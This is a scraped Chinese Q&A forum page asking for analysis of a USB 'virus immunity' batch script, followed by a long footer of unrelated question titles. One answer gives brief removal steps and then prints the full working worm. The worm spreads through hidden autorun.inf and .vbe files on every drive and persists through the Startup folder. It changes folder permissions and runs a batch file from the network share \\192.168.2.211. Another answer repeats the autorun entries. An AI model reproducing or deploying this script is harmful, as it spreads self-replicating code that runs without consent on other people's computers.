问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

天中的一个脚本,麻烦哪位大虾帮忙分析一下(u盘病毒免疫脚本)

发布网友 发布时间:2022-05-23 17:17

我来回答

4个回答

热心网友 时间:2023-10-31 09:22

我也中过啊,下面就是样本文件.
杀毒较简单,
1,瑞星最新升级病毒包可以识别它;
2,手动.注册表中HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue 值设为1,在安全模式下,在cmd.exe命令下找到病毒文件,DIR /A 命令,并用 DEL 文件名 命令,删除所有盘中的病毒文件.
重起就大功告成了.

@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%\bakfiles\"
call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
call:ie "%systemroot%\bakfiles\uda.a"
call:copy uda.a "%systemroot%\bakfiles\"
:s
echo. >uhere-%v%.txt
if exist "%endf%" (set n=1&goto end)
if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat))
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\uda.a" (goto s4)
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
attrib %d%\autorun.inf +a +s +r +h
call:ie "%d%\%~n0.vbe"
:s2
call:vbe "%~nx0" >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%\"
:s4
call:copy "uda.a" "%d%\"
call:ie %d%\*.sk
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe)
if exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
call:copy "%~dpnx0" "%systemroot%\"
call:copy "uda.a" "%systemroot%\"
call:ie "%systemroot%\%~n0.vbe"
call:vbe "%~nx0" >"%systemroot%\%~n0.vbe"
call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
goto :eof
:v
set "v0=%~nx1"
set /a "v0=%v0:~6,2%"
goto :eof
:rm
echo. 看到这个,请不要慌张。电脑病毒的定义为:1、传播性;2、潜伏性;3、破坏性。根据此定义,本脚本这完全符合1,有点符合2,不符合3(若说破坏性也不是没有,但只针对U盘病毒,而且会在删除文件前备份,备份地址:%systemroot%\bakfiles\),因此,病毒二字加了引号,即不是真正的病毒。本脚本的目的是通过U盘传播,并沿途清理U盘中的病毒,如果可能,会把收集到的病毒文件发给作者;不会给您造成太多不便(与其被U盘病毒感染,不如被本脚本感染啦)。如果您觉得这样给您造成了不便,想卸载本脚本,请在%systemdrive%\下新建一个名为8bye的文本文件(不需要写入内容,即:新建%endf%),大约在20秒内完成卸载,并帮助您进行U盘病毒免疫。欲了解更多,请打开 U盘病毒分析 的自述文件(地址:%systemroot%\readme.txt)。谢谢!
echo. 包含文件:u.bat(本文件,4240字节)、uda.a(21674字节,md5:e6762ebf6123bc17ab31995c61bba955)
echo. 为研究性学习而制作,于2007-03-15,望多多支持!作者:CyyIsGood(肇中高一11),联系:cyyisgood@126.com
goto :eof
:vbe
echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:ie
if exist "%~1" (del /a /f /q "%~1")
goto :eof
:copy
call:ie "%~dp2%~nx1"
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%\"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat
cd /d "%~dp0"
goto :eof
:end
set d=!dl:~%n%,1!
echo.%d%:\
if exist %d%:\ (del /a /f /q %d%:\u.vbe %d%:\u.bat %d%:\uda.a)
set /a n=n+1
if not "!dl:~%n%,1!"=="" goto end
call U盘病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%\已经被反U盘病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" "%~nx0"

热心网友 时间:2023-10-31 09:22

ewdio 4.0有免费版 的 你可以下载升级看看

热心网友 时间:2023-10-31 09:23

[AutoRun]
open=wscript.exe u.vbe 鼠标右键的open菜单命令,点击后打开wscript
shell\open\Command=wscript.exe u.vbe
shell\explore\Command=wscript.exe u.vbe
shell\find\Command=wscript.exe u.vbe

热心网友 时间:2023-10-31 09:23

U盘故障 杀毒我写空间了你自己看吧!
http://hi.baidu.com/cgshare/blog/item/e23603c7881812ddd0006044.html
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
个人账户养老金预测公式:现有5万元,缴费20年,能领多少钱? 临沂比较有名的男装品牌 呼伦贝尔市悦动网络科技有限公司怎么样? 呼伦贝尔中汇实业有限公司怎么样? 呼伦贝尔油玉不绝电子商务有限公司怎么样? 如何避免wps卡顿? 属鼠的男人找对象是属什么,属鼠的人和什么属相合 96年鼠的姻缘在哪年 属相相合年份运势提升 2024属鼠找对象属什么最佳 黑客攻击网站能报案吗 从免疫学角度分析,流感病毒属于什么?从生物学角度呢? yesok,舞蹈适合在,升学宴上跳吗? 流行性感冒病毒从免疫的角度看,他属于 要在安徽开书店。。但教辅书在什么地方进货了 合肥有哪些提供大学教辅用书的大型书店、书城 都有哪些有特点的智能手环? 广州教辅书籍批发市场在哪里?有那些公司? 广西教辅书书店在南宁什么地方 索尼dsch200数码相机 死机了镜头也缩不进去不能关机 取了电池再装上开机就卡在英文字母那没反应 hd3000和HD 540v哪个好点 新华书店教辅如何适应市场 mp4断触怎么修复? 谁能翻译一下这个文章,翻成英文的! 笔记本联想Z370,I3,Win7,开机要近2分钟,电脑才买半个月,360扫描,没毒,启动项很少!系统也重装的。 绝地求生需要什么样的配置 市场教辅是什么 哪位大师能帮我翻译这些句子啊,急!!! 各位英语专家们,请帮我翻译以下短文,特此致谢! 高分英语翻译, 免机译! 石家庄教辅书籍批发市场在哪里?有那些公司? 从免疫学角度分析流感患者可以通过输入流感病毒疫苗进行治疗 哪儿错了 高精度HBV载量分析与乙肝病毒DNA免疫荧光检测的区别? 学习病毒学和免疫学 跳舞机yesok要VIP吗 电脑病毒有免疫功能吗 有没有描述 HBV感染细胞免疫原理 及 HBV感染体液免疫原理 的图? 甲型H1N1流感病毒灭活疫苗已研制成功,并对相关人员进行接种.试分析接种者所接种的疫苗和体内发生的免疫 MERS病毒的病原分析 免疫系统是怎样杀死病毒的 假如人的体温是76.9度,是否理论上可免疫所有病毒细菌? 想买第二辆车代步买菜用,请问可以买宝来吗? 九江银行房贷21号款可以宽限到月底吗 台式电脑 本地连接已连上,但是不能上网,求助高手! 北条高史的方头机器人怎么折 机器人逃出精神病医院2 看了你昨天回答的“方头方脑的人指的是”你回答的是机器人,可是课文后面还说了一句,悟空徒儿,。。。。 求一部日本动画片名字,人物变身是圆头,再变身就变成方头,有很多种颜色 高中作文我与机器人不少于八百字 关于变形金刚名字的问题 小时候看过动画片有艘飞船四脚着地飞起来四个脚就收起来了,老大是和可以变成飞机的机器人,飞船四个腿